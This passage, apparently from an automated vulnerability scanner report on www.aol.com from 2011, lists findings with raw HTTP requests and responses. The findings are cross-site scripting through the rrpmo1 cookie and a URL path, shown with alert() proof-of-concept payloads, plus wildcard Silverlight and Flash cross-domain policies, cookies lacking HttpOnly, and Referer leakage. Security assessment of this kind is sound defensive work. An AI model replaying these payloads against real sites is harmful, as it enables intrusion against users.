var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl5e0507"-alert(1)-"c2760e5e3ad";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 25;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

2.7. http://www.aol.com/ [rrpmo1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ee54"-alert(1)-"e1fb94620f3 was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~02ee54"-alert(1)-"e1fb94620f3; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl5

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:15:32 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-73.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=69567B52D7FA279BFACAC498504736BA; Path=/aol
Content-Length: 81536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1313705590192~02ee54"-alert(1)-"e1fb94620f3");</script>
...[SNIP]...

2.8. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ [rrpmo1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3668"-alert(1)-"fd726e338a was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0e3668"-alert(1)-"fd726e338a; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:24 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-36.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=1FCF9FA99CF7E3C6E0DFDE60B5D06216; Path=/aol
Content-Length: 40902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1313705590192~0e3668"-alert(1)-"fd726e338a");</script>
...[SNIP]...

3. Silverlight cross-domain policy  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aol.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:47 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=38
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4. Flash cross-domain policy  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:47 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1124
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
<allow-access-from domain="*.advertising.com"/>
...[SNIP]...

5. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



5.1. http://www.aol.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-174-44.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=CFBB5CE095545547E8FF9BC0BB462364; Path=/aol
Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 17-Aug-2013 22:13:44 GMT; Path=/
Content-Length: 81413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

5.2. http://www.aol.com/ajax.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2520
Set-Cookie: JSESSIONID=A3952DF32658E1DB2F8B42FB462C9CBB; Path=/aol
Content-Length: 2520

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-87592 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...

5.3. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 18 Aug 2011 23:26:23 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-99.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=2E211D57875F8FCD299BAF70F0E8D34E; Path=/aol
Connection: close
Content-Length: 16617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

5.4. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-38.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=AB6892FB05BD4073E3A16F7705718005; Path=/aol
Content-Length: 40895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...

5.5. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp?m=dailyvj&p=videoconfig HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:23 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-72.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=26F2058D44B9A19F05B6636E05EE5CF7; Path=/aol
Content-Length: 13787

<div id="videoShowUrls" class="dn">
You've Got:pair:http://video.aol.com/show/youve-got:show:AOL Daybreak:pair:http://video.aol.com/show/aol-daybreak:show:The Urlesque Show:pair:http://video.aol.c
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 29 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. http://www.aol.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?icid=aolcomlogorefresh5&dlact=dl1 HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:19:29 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-98.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=CD614CEF689D786D18461C3A6507E175; Path=/aol
Content-Length: 81452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
</iframe>
<link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/p5/_v58.6/css/maing.css" />
<script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" class="skin_link" href="http://portal.aolcdn.com/p5/skin/_v8/fuzzy.css" />
<style>
...[SNIP]...
<body class="fuzzy">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/omniture/prod/omniunih_portal_min.js"></script>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327" class="lnid-sec1_lnk1" name="om_weathericon"><img class="wthr_avatar" alt="Dallas, TX: Mostly Clear" title="Dallas, TX: Mostly Clear" src="http://portal.aolcdn.com/p5/_v58.6/css/w/w33.png"/></a>
...[SNIP]...
<a id="aol-header-logo" title="Click here to refresh" name="om_hdrlogo" class="lnid-sec1_lnk1 " href="?icid=aolcomlogorefresh5&dlact=dl1"><img alt="Click here to refresh" src="http://portal.aolcdn.com/p5/forms/326/7116f573-7cda-4e8f-b2ec-b0d272075b69.png"/></a>
...[SNIP]...
<a href="http://mail.aol.com/" class="qnpos1 qn auth-0 show-500 hide-300 thresh-500 plid-47438 lnid-sec1_lnk1" name="om_quicknav_mail_flatstyle" title='AOL Mail' id='mailpreview'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/><span>
...[SNIP]...
</div><a href="http://www.aim.com/products/express/" class="qnpos2 plid-51753 lnid-sec1_lnk2" name="om_quicknav_aim_flatstyle" title='AIM' id='aimexpress'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/></a>
...[SNIP]...
tp://video.aol.com/" target="_blank" class="qnpos7 plid-84662 lnid-sec1_lnk7" name="om_quicknav_quick-nav-video_flatstyle" title='Get millions of video from AOL , AOL partners and third party videos'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/></a>
...[SNIP]...
<li><a title="News" name="om_hnav_sec1_link1" class="icid-navbar_rootnews lnid-sec1_lnk2" href="http://www.huffingtonpost.com/"><b>
...[SNIP]...
<div class='hnav_header'><a title="News" name="om_hnav_sec1_link1" class="icid-navbar_rootnews lnid-sec1_lnk2" href="http://www.huffingtonpost.com/"><b>
...[SNIP]...
<td class='underline_cell'><a title="Breaking News and Opinion on The Huffington Post" name="om_hnav_sec1_link3" class="icid-navbar_huffpo lnid-sec1_lnk3" href="http://www.huffingtonpost.com/">Huffington Post</a>
...[SNIP]...
<td class='underline_cell'><a title="Politics News and Opinion on The Huffington Post" name="om_hnav_sec1_link4" class="icid-navbar_politics lnid-sec1_lnk4" href="http://www.huffingtonpost.com/politics">Politics</a>
...[SNIP]...
<td class='underline_cell'><a title="Pro and college sports news, stats, scores and player updates from SportingNews" name="om_hnav_sec1_link5" class="icid-navbar_sports lnid-sec1_lnk5" href="http://aol.sportingnews.com">Sports</a>
...[SNIP]...
<td><a title="World News and Opinion on The Huffington Post" name="om_hnav_sec1_link7" class="icid-navbar_world lnid-sec1_lnk7" href="http://www.huffingtonpost.com/world">World</a>
...[SNIP]...
<li><a title="Entertainment" name="om_hnav_sec2_link1" class="icid-navbar_rootentertainment lnid-sec2_lnk2" href="http://www.huffingtonpost.com/entertainment/"><b>
...[SNIP]...
<div class='hnav_header'><a title="Entertainment" name="om_hnav_sec2_link1" class="icid-navbar_rootentertainment lnid-sec2_lnk2" href="http://www.huffingtonpost.com/entertainment/"><b>
...[SNIP]...
<td class='underline_cell'><a title="Celebrity news and photos and top music, movie and TV news" name="om_hnav_sec2_link3" class="icid-navbar_entnews lnid-sec2_lnk3" href="http://www.huffingtonpost.com/celebrity/">Celebrity News</a>
...[SNIP]...
<td class='underline_cell'><a title="Comedy News and Opinion on the Huffington Post" name="om_hnav_sec2_link4" class="icid-navbar_comedy lnid-sec2_lnk4" href="http://www.huffingtonpost.com/comedy">Comedy</a>
...[SNIP]...
<td class='underline_cell'><a title="Play hundreds of free online games from Games.com" name="om_hnav_sec2_link5" class="icid-navbar_games lnid-sec2_lnk5" href="http://www.games.com">Games</a>
...[SNIP]...
<td class='underline_cell'><a title="Movie news, show times, tickets, trailers and more from Moviefone" name="om_hnav_sec2_link6" class="icid-navbar_movies lnid-sec2_lnk6" href="http://www.moviefone.com">Movies</a>
...[SNIP]...
<li><a title="Finance" name="om_hnav_sec3_link1" class="icid-navbar_rootfinance lnid-sec3_lnk2" href="http://www.dailyfinance.com"><b>
...[SNIP]...
<div class='hnav_header'><a title="Finance" name="om_hnav_sec3_link1" class="icid-navbar_rootfinance lnid-sec3_lnk2" href="http://www.dailyfinance.com"><b>
...[SNIP]...
<td class='underline_cell'><a title="Business News and Opinion on The Huffington Post" name="om_hnav_sec3_link3" class="icid-navbar_business lnid-sec3_lnk3" href="http://www.huffingtonpost.com/business">Business News</a>
...[SNIP]...
<td class='underline_cell'><a title="Business news, stock quotes and investment advice" name="om_hnav_sec3_link4" class="icid-navbar_Finance lnid-sec3_lnk4" href="http://www.dailyfinance.com">DailyFinance</a>
...[SNIP]...
<td class='underline_cell'><a title="Your quotes, news and summary from DailyFinance" name="om_hnav_sec3_link6" class="icid-navbar_myportfolios lnid-sec3_lnk6" href="http://www.dailyfinance.com/portfolios/myportfolios">My Portfolios</a>
...[SNIP]...
<td><a title="Small business news from the Huffington Post" name="om_hnav_sec3_link8" class="icid-navbar_smallbus lnid-sec3_lnk8" href="http://www.huffingtonpost.com/news/small-business-america/">Small Business</a>
...[SNIP]...
<li><a title="Tech" name="om_hnav_sec4_link1" class="icid-navbar_roottech lnid-sec4_lnk2" href="http://techcrunch.com"><b>
...[SNIP]...
<div class='hnav_header'><a title="Tech" name="om_hnav_sec4_link1" class="icid-navbar_roottech lnid-sec4_lnk2" href="http://techcrunch.com"><b>
...[SNIP]...
<td class='underline_cell'><a title="Coverage of everything new in gadgets and consumer electronics" name="om_hnav_sec4_link3" class="icid-navbar_engadget lnid-sec4_lnk3" href="http://www.engadget.com/">Engadget</a>
